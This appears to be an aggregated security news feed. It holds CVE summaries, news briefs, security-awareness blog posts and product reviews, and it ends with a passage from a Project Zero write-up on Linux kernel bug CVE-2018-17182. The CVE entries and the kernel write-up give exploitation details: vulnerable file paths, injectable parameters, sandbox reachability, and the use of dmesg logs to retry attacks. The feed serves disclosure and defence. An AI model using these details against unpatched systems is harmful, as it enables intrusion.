CVE-2018-1704 (platform_symphony, spectrum_symphony)

IBM Platform Symphony 7.1 Fix Pack 1 and 7.1.1 and IBM Spectrum Symphony 7.1.2 and 7.2.0.2 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 146339.

Hacker says he’ll livestream deletion of Zuckerberg’s Facebook page (updated)

A white-hat hacker briefly promised to livestream his bid to hack into Mark Zuckerberg's Facebook account on Sunday, September 30th). "Broadcasting the deletion of Facebook founder Zuck's account," Chang Chi-yuan told his 26,000-plus followers on the social network, adding: "Scheduled to go live." By Friday afternoon, the stream had been cancelled.

Via: Bloomberg

Source: Chang Chi-yuan (Facebook)

CVE-2018-17580 (tcpreplay)

A heap-based buffer over-read exists in the function fast_edit_packet() in the file send_packets.c of Tcpreplay v4.3.0 beta1. This can lead to Denial of Service (DoS) and potentially Information Exposure when the application attempts to process a crafted pcap file.

Weekly Update 106

Presently sponsored by: Netsparker - a scalable and dead accurate web application security solution. Scan thousands of web applications within just hours.

Weekly Update 106

Home again! Another NDC is down and I talk a little about how the talks were rated and about PubConf (make sure you get to one of these one day!) I've got another couple of weeks at home before any more travel and I'll talk more about the next things as they draw closer.

This week, I'm on my new iPhone (which is very similar to my old iPhone), I'm talking about Uber getting fined, Cloudflare introducing some very cool new things, Firefox Monitor launching on top of the HIBP APIs and my newfound love for the Pi-hole. Seriously, this is a very cool bit of tech and a fun project to build for home. I'll share more over time as I get a better idea of its strengths and weaknesses but for now, yeah, just get one!

Weekly Update 106
Weekly Update 106
Weekly Update 106

References

  1. Despite my dislike of Face ID, I've rolled over to the new iPhone Xs (that's a link through to the blog post on the dramas I was having with it)
  2. Uber got pinged $148M for their breach (their concealment of it deserves a big penalty, but there's been no personal impact from it)
  3. Cloudflare is making bandwidth cheap (the Bandwidth Alliance could be awesome for costs!)
  4. Plus, they're becoming a domain registrar (yet another way of making the platform more accessible and driving down costs)
  5. Mozilla launched Firefox Monitor (yes, it's effectively another skin on HIBP, but it massively expands the reach of the service)
  6. Pi-hole - get one! (so impressed with this little beaudy!)
  7. And here's the ad blockers blog post just for good measure (I'd really like to see a more responsible approach on their behalf)
  8. DigiCert is sponsoring my blog this week (they're really putting a lot of work into IoT security lately, check 'em out!)

CVE-2018-17573 (wp-insert)

The Wp-Insert plugin through 2.4.2 for WordPress allows upload of arbitrary PHP code because of the exposure and configuration of FCKeditor under fckeditor/editor/filemanager/browser/default/browser.html, fckeditor/editor/filemanager/connectors/test.html, and fckeditor/editor/filemanager/connectors/uploadtest.html.

“Isolated among Allies and Foes Alike” US Regime Announces Offensive Hacking Campaign

Big day in the news for international relations. The leader of the US Regime took a self-promotion campaign to the UN body and received only laughs and mockery. The Independent has sharp analysis of what the vacuum in US leadership means for global policy makers. First appearance before intergovernmental organisation after Washington cut refugee aid … Continue reading “Isolated among Allies and Foes Alike” US Regime Announces Offensive Hacking Campaign

CVE-2018-16659 (id.prove)

An issue was discovered in Rausoft ID.prove 2.95. The login page allows SQL injection via Microsoft SQL Server stacked queries in the Username POST parameter. Hypothetically, an attacker can utilize master..xp_cmdshell for the further privilege elevation.

CVE-2018-14037 (kendo_ui_editor)

Cross-site scripting (XSS) vulnerability in Progress Kendo UI Editor v2018.1.221 allows remote attackers to inject arbitrary JavaScript into the DOM of the WYSIWYG editor because of the editorNS.Serializer toEditableHtml function in kendo.all.min.js. If the victim accesses the editor, the payload gets executed. Furthermore, if the payload is reflected at any other resource that does rely on the sanitisation of the editor itself, the JavaScript payload will be executed in the context of the application. This allows attackers (in the worst case) to take over user sessions.

NBlog Sept 28 – phishing awareness module imminent

Things are falling rapidly into place as the delivery deadline for October's NoticeBored awareness module on phishing looms large.

Three cool awareness poster graphics are in from the art department, and three awareness seminars are about done. 

The seminar slides and speaker notes, in turn, form the basis for accompanying awareness briefings for staff, managers and professionals, respectively.  

We also have two 'scam alert' one-pagers, plus the usual set of supporting collateral all coming along nicely - a train-the-trainer guide on how to get the best out of the new batch of materials, an awareness challenge/quiz, an extensive glossary (with a few new phishing-related terms added this month), an updated policy template, Internal Controls Questionnaire (IT audit checklist), board agenda, phishing maturity metric, and newsletter.  Lots on the go and several gaps to be plugged yet.


Today we're ploughing on, full speed ahead thanks to copious fresh coffee and Guy Garvey singing "It's all gonna be magnificent" on the office sound system to encourage us rapidly towards the end of another month's furrow.  So inspirational!  

We've drawn from at least five phishing-related reports and countless Internet sources, stitching together a patchwork of data, analysis and advice in a more coherent form that makes sense to our three audience groups. I rely on a plain text file of notes, mostly quotable paragraphs and URLs for the sources since we always credit our sources. There are so many aspects to phishing that I'd be lost without my notes!  As it is, I have a headfull of stuff on the go so I press ahead with the remaining writing or I'll either lose the plot completely or burst!

For most organizations, security awareness and training is just another thing on a long to-do list with limited resources and many competing priorities, whereas we have the benefit of our well-practiced production methods and team, and the luxury of being able to concentrate on the single topic at hand. We do have other things going on, not least running the business, feeding the animals and blogging. But today is when the next module falls neatly into place, ready to deliver and then pause briefly for breath before the next one. Our lovely customers, meanwhile, are busy running their businesses and rounding-off their awareness and training activities on 'outsider threats', September's topic. As those awareness messages sink in, October's fresh topic and new NoticeBored module will boost energy and take things up another notch, a step closer to the corporate security culture that generates genuine business returns from all this effort.

CVE-2018-1736 (websphere_portal)

IBM WebSphere Portal 7.0, 8.0, 8.5, and 9.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 147906.

CVE-2018-1660 (websphere_portal)

IBM WebSphere Portal 7.0, 8.0, 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-force ID: 144886.

CVE-2018-1820 (websphere_portal)

IBM WebSphere Portal 8.0, 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 150096.

CVE-2018-1716 (websphere_portal)

IBM WebSphere Portal 7.0, 8.0, 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 147164.

Cisco unearths 13 ‘High Impact’ IOS vulnerabilities you need to patch now

Cisco today exposed 13 vulnerabilities in its IOS and IOS XE switch and router operating software that the company said should be patched as soon as possible.

The vulnerabilities were detailed in Cisco’s twice-yearly dump of IOS exposures. All have a High Impact security rating, and fixes should be evaluated by users quickly.

The company said this particular batch of issues could let an attacker gain elevated privileges for an affected device or cause a denial of service (DoS) on an affected device.

To read this article in full, please click here

Feature, Bug or Just a Huge Security Risk? Skype for Business, Examined

Here at Heimdal Security, we spread our time between providing security tools to prevent serious attacks like ransomware or next-gen malware and providing the education necessary to keep personal data safe across various platforms and devices.

Sometimes, it becomes obvious that tools and education alone won’t keep users truly safe online, nor will they enforce their privacy. Sometimes, ubiquitous, extremely popular services release some features that truly boggle the mind. Skype for Business is one.

This week, we discovered a serious security risk and privacy breach with the Skype for Business app. It was not related to hacking and other cyber-attacks but a pure “feature”, whose purpose and value we haven’t yet been able to decipher.

If you do a Skype for Business call with “screen-sharing” turned on, be prepared to share more than what you wanted.

Once the person who started screen-sharing hangs up, the desktop-sharing function will continue. The people at the other end of the line will still see what’s happening there.

If the person who had hosted the session does not notice the tiny warning at the top, they will continue sharing whatever they’re doing on the screen. Spreadsheets with sensitive financial data, inbox contents, private messages on Facebook, all of them will be seen by the other person.

Had a cybercriminal participated in a conversation like this, they would have had a field day with the info obtained. In some areas, a competitor could do seriously damage with how much information they are able to see.

We thought that we had stumbled upon a serious security flaw. Imagine our surprise when, after a few seconds of Googling the issue and thinking about contacting Microsoft, we came across this thread. No, screen sharing after ending a call is a “feature, not a bug”. Never mind the fact that a regular Skype user first calls someone to start a meeting, then opens a presentation, then closes the call and assumes that the entire interaction ended.

Why would someone possibly want for their screen to still be visible to the other person, even though the dialogue ended? Even if, by chance, that was the case, the tiny ribbon that lets you know screen-sharing has such an unobtrusive design, a regular user will definitely miss it. For such a security-sensitive feature, you’d think neon colors were in order. Certainly, a pleasant design should not be the only priority for Skype for Business.

After all, the people using it do have plenty of sensitive information that should not leak.

Here is what the caller who initiated screen-sharing can see once he/she hangs up.

skype for business screen share issue

Here is what’s visible to the ones that just left that call. Spoiler: it’s everything the initial caller is currently doing.

skype for business share screen issue

And, finally, this is the placement of the ribbon that was designed to let the user know their screen is still being broadcast. It’s almost black, on top of a browser bar of the same color. If someone had a secondary display and they were to continue working on the screen with the Skype for Business window, it would have been almost impossible to spot that message.

skype for business screen sharing issue

What’s worse is that this is something that’s been signaled plenty of times.

Microsoft’s response? “It’s an expected behavior,” said a customer representative. He followed that an invitation to “vote for this feedback” at another link. And a recommendation to “close the Skype for Business chat window to end Skype call and screen sharing at the same time.”

Yes, the official suggestion is to close the entire window, not press the button that’s for ending the call.

Give it a bit more time, and instead of customer support signaling a bad UI design (user interface) and the developers fixing it, someone will tell you to put a sticker on your webcam if you want to stop broadcasting. This is not to mention what a huge GDPR infringement this Skype for Business bug is. Some experts point out that even sharing usernames in unencrypted communications or on screens can be against the General Data Protection Regulation.

 

Microsoft is not alone in this and could probably pin this one on miscommunication, not bad intentions.

What users have to do is to secure their device with the essential security layers and remain updated with current news, so they can act swiftly and protect themselves and their valuable data.

The post Feature, Bug or Just a Huge Security Risk? Skype for Business, Examined appeared first on Heimdal Security Blog.

Making an Impact with Security Awareness Training: Quick Wins and Sustained Impact

Posted under: Research and Analysis

Our last post explained Continuous Contextual Content as a means to optimize the effectiveness of a security awareness program. CCC acknowledges that users won’t get it, at least not initially. That means you need to reiterate your lessons over and over (and probably over) again. But when should you do that? Optimally when their receptivity is high – when they just made a mistake.

So you determine the relative risk of users, and watch for specific actions or alerts. When you see such behavior, deliver the training within the context of what they see then. But that’s not enough. You want to track the effectiveness of your training (and your security program) to get a sense of what works and what doesn’t. If you can’t close the loop on effectiveness, you have no idea whether your efforts are working, or how to continue improving your program.

To solidify the concepts, let’s go through a scenario which works through the process step by step. Let’s say you work for a large enterprise in the financial industry. Senior management increasingly worries about ransomware and data leakage. A recent penetration test showed that your general security controls are effective, but in their phishing simulation over half your employees clicked a fairly obvious phish. And it’s a good thing your CIO has a good sense of humor, because the pen tester gained full access to his machine via a well crafted drive-by attack which would have worked against the entire senior team.

So your mission, should you choose to accept it, is to implement security awareness training for the company. Let’s go!

Start with Urgency

As mentioned, your company has a well-established security program. So you can hit the ground running, using your existing baseline security data. Next identify the most significant risks and triage immediate action to start addressing them. Acting with urgency serves two purposes. It can give you a quick win, and we all know how important it is to show value immediately. As a secondary benefit you can start to work on training employees on a critical issue right away.

Your pen test showed that phishing poses the worst problems for your organization, so that’s where you should focus initial efforts. Given the high-level support for the program, you cajole your CEO into recording a video discussing the results of the phishing test and the importance of fixing the issue. A message like this helps everyone understand the urgency of addressing the problem and that the CEO will be watching.

Following that, every employee completes a series of five 3-5 minute training videos walking them through the basics of email security, with a required test at the end. Of course it’s hard to get 100% participation in anything, so you’ve already established consequences for those who choose not to complete the requirement. And the security team is available to help people who have a hard time passing.

It’s a balance between being overly heavy-handed against the importance of training users to defend themselves. You need to ensure employees know about the ongoing testing program, and that they’ll be testing periodically. That’s the continuous part of the approach – it’s not a one-time thing.

Introduce Contextual Training

As you execute on your initial phishing training effort, you also start to integrate your security awareness training platform with existing email, web, and DNS security services. This integration involves receiving an alert when an employee clicks a phishing message, automatically signing them up for training, and delivering a short (2-3 minute) refresher on email security. Of course contextual training requires flexibility, because an employee might be in the middle of a critical task. But you can establish an expectation that a vulnerable employee needs to complete training that day.

Similarly, if an employee navigates to a known malicious site, the web security service sends a trigger, and the web security refresher runs for that employee. The key is to make sure the interruption is both contextual and quick. The employee did this, so they need training immediately. Even a short delay will reduce the training’s effectiveness.

Additionally, you’ll be running ongoing training and simulations with employees. You’ll perform some analysis to pinpoint the employees who can’t seem to stop clicking things. These employees can get more intensive training, and escalation if they continue to violate corporate policies and put data at risk.

Overhaul Onboarding

After initial triage and integration with your security controls, you’ll work with HR to overhaul the training delivered during their onboarding process. You are now training employees continuously, so you don’t need to spend 3 hours teaching them about phishing and the hazards of clicking links.

Then onboarding can shift, to focus on establishing a culture of security from Day 1. This entails educating new employees on online and technology policies, and acceptable use expectations. You also have an opportunity to set expectations for security awareness training. Make clear that employees will be tested on an ongoing basis, and inform them who sees the results (their managers, etc.), along with the consequences of violating acceptable use policies.

Again, a fine line exists between being draconian and setting clear expectations. If the consequences have teeth (as they should), employees must know, and sign off on their understanding. We also recommend you test each new employee within a month of their start date to ensure they comprehend security expectations and retained their initial lessons.

Start a Competition

Once your program settles in over six months or so, it’s time to shake things up again. You can set up a competition, inviting the company to compete for the Chairperson’s Security Prize. Yes, you need to get the Chairperson on board for this, but that’s usually pretty easy because it helps the company. The prize needs to be impactful, and more than bragging rights. Maybe you can offer the winning department an extra day of holiday for the year. And a huge trophy. Teams love to compete for trophies they can display prominently in their area.

You’ll set the ground rules, including an internal red team and hunting team attacking each group. You’ll be tracking how many employees fall for the attacks and how many report the issues. Your teams can try physically breaching the facilities as well. You want the attacks to dovetail with ongoing security training and testing initiatives to reinforce security culture.

Run Another Simulation

You’ll also want to stage a widespread simulation a few months after the initial foray. Yes, you’ll be continuously testing employees as part of your continuous program. But getting a sense of company-wide results is also helpful. You should compare results from the initial test against the new results. Are fewer employees falling for the ruse? Are more reporting spammy and phishing emails to the central group? Ensuring the trend lines are moving in the right direction boosts the program and helps justify ongoing investment. You feed the results into the team scoring of the competition.

Lather, Rinse, Repeat

At some point, when another high-profile issue presents itself, you should take a similar approach. Let’s say your organization does a lot of business in Europe, so GDPR presents significant risk. You’ll want to train employees on how you define customer data and how to handle it.

Next determine whether you need special training for this issue, or whether you can integrate it into your more extensive bi-annual training for all employees. Every six months all employees sit for perhaps an hour, watching an update on both new hacker tactics and changes to corporate security policies.

Once that round of training completes, you will roll out new tests to highlight how customer data could be lost or stolen. Factor the new tests into your next competition as well, to keep focus on the changing nature of security and the ongoing contest.

Sustaining Impact

Once your program is humming along, we suggest you pick a new high priority topic every six months to make that the focus of your semi-annual scheduled training. As part of addressing this new topic, you’ll integrate with the relevant controls to enable ongoing contextual training and perform an initial test (to establish a baseline), and then track improvement over time.

You’ll also want a more comprehensive set of reports to track the effectiveness of your awareness training; deliver this information to senior management, and perhaps the audit committee. Maybe each quarter you’ll report on how much contextual training employees received, and how much or little they repeated mistakes after training. You’ll also want to report on the overall number of successful attacks, alongside trends of which attacks worked and which got blocked. Being able to map those results back to training topics makes an excellent case for ongoing investment.

At some point the competition will end and you’ll crown the winner. We suggest making a big deal of the winning team. Maybe you can record the award ceremony with the chairperson and memorialize their victory in the company newsletter. You want to make sure all employees understand security is essential and visible at the highest echelons of your organization.

It’s a journey, not a destination, so ensure consistency in your program. Add new focus topics to extend your employee knowledge, keep your content current and interesting, and hold your employees to a high standard – make sure they understand expectations and the consequences of violating corporate policies. Building a security culture requires patience, persistence, and accountability. Anchoring your security awareness training program with continuous, contextual content will go a long way to establishing such a security culture.

With that we wrap up this series on Making an Impact with Security Awareness Training. Thanks again to Mimecast for licensing this content, and we’ll have the assembled and edited paper available in our Research Library within a couple weeks.

- Mike Rothman (0) Comments Subscribe to our daily email digest

Do You Suffer From Breach Optimism Bias?

If you’ve been in the information security field for at least a year, you’ve undoubtedly heard your organization defend the lack of investment in, change to or optimization of a cybersecurity policy, mitigating control or organizational belief. This “It hasn’t happened to us so it likely won’t happen” mentality is called optimism bias, and it’s an issue in our field that predates the field itself.

Read my full article over at Forbes.com.

Best security software: How 20 cutting-edge tools tackle today’s threats

Threats are constantly evolving and, just like everything else, tend to follow certain trends. Whenever a new type of threat is especially successful or profitable, many others of the same type will inevitably follow. The best defenses need to mirror those trends so users get the most robust protection against the newest wave of threats. Along those lines, Gartner has identified the most important categories in cybersecurity technology for the immediate future.

We wanted to dive into the newest cybersecurity products and services from those hot categories that Gartner identified, reviewing some of the most innovative and useful from each group. Our goal is to discover how cutting-edge cybersecurity software fares against the latest threats, hopefully helping you to make good technology purchasing decisions.

To read this article in full, please click here

F-Secure Freedome review: A VPN with some built-in antivirus features

F-Secure Freedome in brief:

  • P2P allowed: No
  • Business location: Finland
  • Number of servers:  N/A
  • Number of country locations: 22
  • Cost: $50-$80 per year
  • VPN protocol: OpenVPN
  • Data encryption: AES 128-bit
  • Data authentication: AES 128-bit
  • Handshake encryption: 2048-bit RSA keys with SHA-256 certificates

There are a few VPN services that offer their own antivirus, one is Avira Phantom VPN Pro, which we looked at previously; Finland-based F-Secure is another. The company’s Freedome VPN is a premium service that offers 22 country locations around the world and extra freebies like tracker and malicious-site blocking.

To read this article in full, please click here

Extreme Ownership – Enterprise Security Weekly #108

This week, Paul and Matt Alderman talk about Threat and Vulnerability management, and how Cloud and Application security's impact on vendors can help with integration in the Enterprise! In the Enterprise News this week, Bomgar to be renamed BeyondTrust after acquisition, Attivo brings cyber security deception to containers and serverless, Symantec extends data loss prevention platform with DRM, ExtraHop announces the availability of Reveal(x) for Azure, and Cloud Native applications are at risk from Zero Touch attacks! All that and more on this episode of Enterprise Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode108

 

Visit https://www.securityweekly.com/esw for all the latest episodes!

 

Visit https://www.activecountermeasures/esw to sign up for a demo or buy our AI Hunter!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Jaywalking is a Fantasy Crime

Brilliant comedy routine by Hannibal Buress Humor helps underscore a very real problem with Jaywalking laws, which any historian should be able to tell you: What sets jaywalking apart is that it never should have been against the law in the first place. City streets were meant for foot traffic and horses from ancient times … Continue reading Jaywalking is a Fantasy Crime

Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish

Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.


Category:

CTU Research

Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.

CVE-2018-16711 (advanced_systemcare)

IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send an IOCTL (0x9C402088) with a buffer containing user defined content. The driver's subroutine will execute a wrmsr instruction with the user's buffer for input.

CVE-2018-16588 (shadow)

Privilege escalation can occur in the SUSE useradd.c code in useradd, as distributed in the SUSE shadow package through 4.2.1-27.9.1 for SUSE Linux Enterprise 12 (SLE-12) and through 4.5-5.39 for SUSE Linux Enterprise 15 (SLE-15). Non-existing intermediate directories are created with mode 0777 during user creation. Given that they are world-writable, local attackers might use this for privilege escalation and other unspecified attacks. NOTE: this would affect non-SUSE users who took useradd.c code from a 2014-04-02 upstream pull request; however, no non-SUSE distribution is known to be affected.

NBlog Sept 27 – from weariness via wariness to awareness

Weary of the same old stuff, day after day?  Wary of over-blown threats, confusing security controls and crude "Do it or else!" compliance demands blasted out repeatedly and loudly in the vain hope some might just stick?

Us too! Those are common issues in awareness and training, betraying a lack of appreciation and respect for the audience. We can do better. 

No really, we must.

Awareness and training leading to understanding and genuine support for security is the NoticeBored way. We take the trouble to pick-apart complex issues such as phishing and pharming, explaining them straightforwardly with plenty of diagrams and examples to inform, engage and motivate three distinct audiences. We spend at least as much time exploring the broader context to the issues, explaining why they are of concern, as we do telling people how to respond, what to do and not to do. We are addressing intelligent adults through soundly-researched content, professionally crafted for this specific purpose.  

There's more to this than meets the eye. More Haynes manuals and exploded parts diagrams than childish cartoons or death-by-PowerPoint bullet points.

NoticeBored shines through topics such as phishing. Social engineers, identity thieves and other fraudsters are actively innovating, constantly on the search for new tricks to phool even wary victims. We can only get so far by talking about previous and current attacks because there's something new on the way tomorrow or the day after. Future-proofing requires a deeper appreciation of our adversaries' motivation and techniques ... which is part of the awareness challenge. 'Think like a phisher' is much easier said than done. On top of that, we must remain ethical, steering well clear of accidentally encouraging people to become phishers!  

Right there is an example of an information risk that few organizations even consider - not so much inept awareness and training as the possibility of phishing being committed by insiders against their colleagues and employer. Having covered insider threats and outsider threats in the previous two months, we have laid the foundation to take things up a level in October's NoticeBored module.

Enough blogging: must dash. I have to 'revalidate my login' to avoid losing my email account, again ... 

CVE-2018-17215 (postman)

An information-disclosure issue was discovered in Postman through 6.3.0. It validates a server's X.509 certificate and presents an error if the certificate is not valid. Unfortunately, the associated HTTPS request data is sent anyway. Only the response is not displayed. Thus, all contained information of the HTTPS request is disclosed to a man-in-the-middle attacker (for example, user credentials).

CVE-2018-8850 (e-alert_firmware)

Philips e-Alert Unit (non-medical device), Version R2.1 and prior. The software does not validate input properly, allowing an attacker to craft the input in a form that is not expected by the rest of the application. This would lead to parts of the unit receiving unintended input, which may result in altered control flow, arbitrary control of a resource, or arbitrary code execution.

CVE-2018-14803 (e-alert_firmware)

Philips e-Alert Unit (non-medical device), Version R2.1 and prior. The Philips e-Alert contains a banner disclosure vulnerability that could allow attackers to obtain extraneous product information, such as OS and software components, via the HTTP response header that is normally not available to the attacker, but might be useful information in an attack.

CVE-2018-8842 (e-alert_firmware)

Philips e-Alert Unit (non-medical device), Version R2.1 and prior. The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. The Philips e-Alert communication channel is not encrypted which could therefore lead to disclosure of personal contact information and application login credentials from within the same subnet.

Uber will pay $148 million for 2016 data breach coverup

Last year, reports surfaced that Uber had been hit with a data breach, but instead of reporting it to the government or to those affected, it chose to cover it up. Now, the company will pay $148 million as part of a settlement, and the money will be disbursed between each US state and Washington, DC. After the hack and Uber's response to it became public, a number of states launched investigations into the incident while others filed lawsuits.

Via: CNBC

Source: New York Attorney General

A cache invalidation bug in Linux memory management

Posted by Jann Horn, Google Project Zero

This blogpost describes a way to exploit a Linux kernel bug (CVE-2018-17182) that exists since kernel version 3.16. While the bug itself is in code that is reachable even from relatively strongly sandboxed contexts, this blogpost only describes a way to exploit it in environments that use Linux kernels that haven't been configured for increased security (specifically, Ubuntu 18.04 with kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37). This demonstrates how the kernel configuration can have a big impact on the difficulty of exploiting a kernel bug.

The bug report and the exploit are filed in our issue tracker as issue 1664.

Fixes for the issue are in the upstream stable releases 4.18.9, 4.14.71, 4.9.128, 4.4.157 and 3.16.58.

The bug

Whenever a userspace page fault occurs because e.g. a page has to be paged in on demand, the Linux kernel has to look up the VMA (virtual memory area; struct vm_area_struct) that contains the fault address to figure out how the fault should be handled. The slowpath for looking up a VMA (in find_vma()) has to walk a red-black tree of VMAs. To avoid this performance hit, Linux also has a fastpath that can bypass the tree walk if the VMA was recently used.

The implementation of the fastpath has changed over time; since version 3.15, Linux uses per-thread VMA caches with four slots, implemented in mm/vmacache.c and include/linux/vmacache.h. Whenever a successful lookup has been performed through the slowpath, vmacache_update() stores a pointer to the VMA in an entry of the array current->vmacache.vmas, allowing the next lookup to use the fastpath.

Note that VMA caches are per-thread, but VMAs are associated with a whole process (more precisely with a struct mm_struct; from now on, this distinction will largely be ignored, since it isn't relevant to this bug). Therefore, when a VMA is freed, the VMA caches of all threads must be invalidated - otherwise, the next VMA lookup would follow a dangling pointer. However, since a process can have many threads, simply iterating through the VMA caches of all threads would be a performance problem.

To solve this, both the struct mm_struct and the per-thread struct vmacache are tagged with sequence numbers; when the VMA lookup fastpath discovers in vmacache_valid() that current->vmacache.seqnum and current->mm->vmacache_seqnum don't match, it wipes the contents of the current thread's VMA cache and updates its sequence number.

The sequence numbers of the mm_struct and the VMA cache were only 32 bits wide, meaning that it was possible for them to overflow. To ensure that a VMA cache can't incorrectly appear to be valid when current->mm->vmacache_seqnum has actually been incremented 232 times, vmacache_invalidate() (the helper that increments current->mm->vmacache_seqnum) had a special case: When current->mm->vmacache_seqnum wrapped to zero, it would call vmacache_flush_all() to wipe the contents of all VMA caches associated with current->mm. Executing vmacache_flush_all() was very expensive: It would iterate over every thread on the entire machine, check which struct mm_struct it is associated with, then if necessary flush the thread's VMA cache.

In version 3.16, an optimization was added: If the struct mm_struct was only associated with a single thread, vmacache_flush_all() would do nothing, based on the realization that every VMA cache invalidation is preceded by a VMA lookup; therefore, in a single-threaded process, the VMA cache's sequence number is always close to the mm_struct's sequence number:

/*
* Single threaded tasks need not iterate the entire
* list of process. We can avoid the flushing as well
* since the mm's seqnum was increased and don't have
* to worry about other threads' seqnum. Current's
* flush will occur upon the next lookup.
*/
if (atomic_read(&mm->mm_users) == 1)
return;

However, this optimization is incorrect because it doesn't take into account what happens if a previously single-threaded process creates a new thread immediately after the mm_struct's sequence number has wrapped around to zero. In this case, the sequence number of the first thread's VMA cache will still be 0xffffffff, and the second thread can drive the mm_struct's sequence number up to 0xffffffff again. At that point, the first thread's VMA cache, which can contain dangling pointers, will be considered valid again, permitting the use of freed VMA pointers in the first thread's VMA cache.

The bug was fixed by changing the sequence numbers to 64 bits, thereby making an overflow infeasible, and removing the overflow handling logic.

Reachability and Impact

Fundamentally, this bug can be triggered by any process that can run for a sufficiently long time to overflow the reference counter (about an hour if MAP_FIXED is usable) and has the ability to use mmap()/munmap() (to manage memory mappings) and clone() (to create a thread). These syscalls do not require any privileges, and they are often permitted even in seccomp-sandboxed contexts, such as the Chrome renderer sandbox (mmap, munmap, clone), the sandbox of the main gVisor host component, and Docker's seccomp policy.

To make things easy, my exploit uses various other kernel interfaces, and therefore doesn't just work from inside such sandboxes; in particular, it uses /dev/kmsg to read dmesg logs and uses an eBPF array to spam the kernel's page allocator with user-controlled, mutable single-page allocations. However, an attacker willing to invest more time into an exploit would probably be able to avoid using such interfaces.

Interestingly, it looks like Docker in its default config doesn't prevent containers from accessing the host's dmesg logs if the kernel permits dmesg access for normal users - while /dev/kmsg doesn't exist in the container, the seccomp policy whitelists the syslog() syscall for some reason.

BUG_ON(), WARN_ON_ONCE(), and dmesg

The function in which the first use-after-free access occurs is vmacache_find(). When this function was first added - before the bug was introduced -, it accessed the VMA cache as follows:

      for (i = 0; i < VMACACHE_SIZE; i++) {
              struct vm_area_struct *vma = current->vmacache[i];

              if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
                      BUG_ON(vma->vm_mm != mm);
                      return vma;
              }
      }

When this code encountered a cached VMA whose bounds contain the supplied address addr, it checked whether the VMA's ->vm_mm pointer matches the expected mm_struct - which should always be the case, unless a memory safety problem has happened -, and if not, terminated with a BUG_ON() assertion failure. BUG_ON() is intended to handle cases in which a kernel thread detects a severe problem that can't be cleanly handled by bailing out of the current context. In a default upstream kernel configuration, BUG_ON() will normally print a backtrace with register dumps to the dmesg log buffer, then forcibly terminate the current thread. This can sometimes prevent the rest of the system from continuing to work properly - for example, if the crashing code held an important lock, any other thread that attempts to take that lock will then deadlock -, but it is often successful in keeping the rest of the system in a reasonably usable state. Only when the kernel detects that the crash is in a critical context such as an interrupt handler, it brings down the whole system with a kernel panic.

The same handler code is used for dealing with unexpected crashes in kernel code, like page faults and general protection faults at non-whitelisted addresses: By default, if possible, the kernel will attempt to terminate only the offending thread.

The handling of kernel crashes is a tradeoff between availability, reliability and security. A system owner might want a system to keep running as long as possible, even if parts of the system are crashing, if a sudden kernel panic would cause data loss or downtime of an important service. Similarly, a system owner might want to debug a kernel bug on a live system, without an external debugger; if the whole system terminated as soon as the bug is triggered, it might be harder to debug an issue properly.
On the other hand, an attacker attempting to exploit a kernel bug might benefit from the ability to retry an attack multiple times without triggering system reboots; and an attacker with the ability to read the crash log produced by the first attempt might even be able to use that information for a more sophisticated second attempt.

The kernel provides two sysctls that can be used to adjust this behavior, depending on the desired tradeoff:

  • kernel.panic_on_oops will automatically cause a kernel panic when a BUG_ON() assertion triggers or the kernel crashes; its initial value can be configured using the build configuration variable CONFIG_PANIC_ON_OOPS. It is off by default in the upstream kernel - and enabling it by default in distributions would probably be a bad idea -, but it is e.g. enabled by Android.
  • kernel.dmesg_restrict controls whether non-root users can access dmesg logs, which, among other things, contain register dumps and stack traces for kernel crashes; its initial value can be configured using the build configuration variable CONFIG_SECURITY_DMESG_RESTRICT. It is off by default in the upstream kernel, but is enabled by some distributions, e.g. Debian. (Android relies on SELinux to block access to dmesg.)

Ubuntu, for example, enables neither of these.


The code snippet from above was amended in the same month as it was committed:

      for (i = 0; i < VMACACHE_SIZE; i++) {
               struct vm_area_struct *vma = current->vmacache[i];
-               if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
-                       BUG_ON(vma->vm_mm != mm);
+               if (!vma)
+                       continue;
+               if (WARN_ON_ONCE(vma->vm_mm != mm))
+                       break;
+               if (vma->vm_start <= addr && vma->vm_end > addr)
                       return vma;
-               }
       }

This amended code is what distributions like Ubuntu are currently shipping.

The first change here is that the sanity check for a dangling pointer happens before the address comparison. The second change is somewhat more interesting: BUG_ON() is replaced with WARN_ON_ONCE().

WARN_ON_ONCE() prints debug information to dmesg that is similar to what BUG_ON() would print. The differences to BUG_ON() are that WARN_ON_ONCE() only prints debug information the first time it triggers, and that execution continues: Now when the kernel detects a dangling pointer in the VMA cache lookup fastpath - in other words, when it heuristically detects that a use-after-free has happened -, it just bails out of the fastpath and falls back to the red-black tree walk. The process continues normally.

